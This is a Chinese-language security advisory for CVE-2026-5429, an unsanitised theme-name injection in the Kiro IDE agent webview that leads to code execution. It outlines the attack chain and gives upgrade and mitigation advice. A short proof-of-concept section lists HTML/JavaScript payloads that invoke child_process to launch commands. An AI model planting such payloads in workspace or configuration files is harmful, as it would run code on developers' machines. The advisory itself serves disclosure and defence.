CVE-2026-5429 CVSS 7.8 高危

CVE-2026-5429 Kiro IDE 任意代码执行漏洞

披露日期: 2026-04-02

来源: ff89ba41-3aa1-4d27-914a-91399e9639e5

漏洞信息

漏洞编号

CVE-2026-5429

漏洞类型

远程代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Kiro IDE

漏洞概述

Kiro IDE 在 0.8.140 版本之前存在安全漏洞。该漏洞源于 Kiro Agent webview 在网页生成过程中未对输入进行清理。当本地用户打开工作区并信任该工作区时，远程未经身份验证的攻击者可通过特制的颜色主题名称利用此漏洞，导致在系统上执行任意代码。

技术细节

该漏洞的根本原因是 Kiro IDE 中的 Kiro Agent webview 组件在渲染网页时，缺乏对用户输入的消毒机制，特别是对“颜色主题名称”参数的处理。由于 IDE 使用 Web 技术构建，webview 组件通常拥有较高的权限。攻击者可以创建一个恶意的工作区，并在其配置文件中设置一个包含恶意 JavaScript 代码的颜色主题名称。当受害者使用 Kiro IDE 打开该工作区时，系统会弹出提示询问是否信任该工作区。一旦用户确认信任，IDE 就会解析并渲染该配置。此时，未经过滤的主题名称被注入到 webview 的 DOM 中，触发脚本执行。利用该漏洞，攻击者可以绕过沙箱限制，调用系统底层 API，从而实现远程代码执行，完全控制受害者的开发环境。

攻击链分析

STEP 1

1. 准备恶意环境

攻击者创建一个包含恶意配置文件的工作区，将颜色主题名称设置为包含恶意 JavaScript 代码的字符串。

STEP 2

2. 诱导受害者

攻击者通过某种方式（如代码分享、钓鱼链接）诱导受害者下载并使用 Kiro IDE 打开该恶意工作区。

STEP 3

3. 用户交互

受害者在 Kiro IDE 中打开工作区，系统弹出提示询问是否信任该工作区。受害者点击“信任”按钮。

STEP 4

4. 触发漏洞

Kiro IDE 渲染工作区设置，未经过滤的主题名称被注入到 Kiro Agent webview 中，导致恶意代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-5429
// This payload demonstrates how a crafted theme name can lead to code execution.
// In a real attack, this string would be placed in the workspace configuration file.

// Example payload to execute a command (e.g., opening calculator)
const payload = "<img src=x onerror='window.require(\"child_process\").exec(\"calc.exe\")>'";

// Alternatively, using a script tag if the context allows
const scriptPayload = "<script>require('child_process').spawn('cmd', ['/c', 'calc'])</script>";

console.log("Malicious Theme Name Payload:", scriptPayload);

// Note: The victim must open the workspace and click 'Trust' for the payload to trigger.

影响范围

Kiro IDE < 0.8.140

防御指南

临时缓解措施

建议用户立即将 Kiro IDE 升级至 0.8.140 或更高版本以修复此漏洞。在升级之前，请勿打开或信任来源不明的项目工作区，特别是那些包含可疑配置文件的项目。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表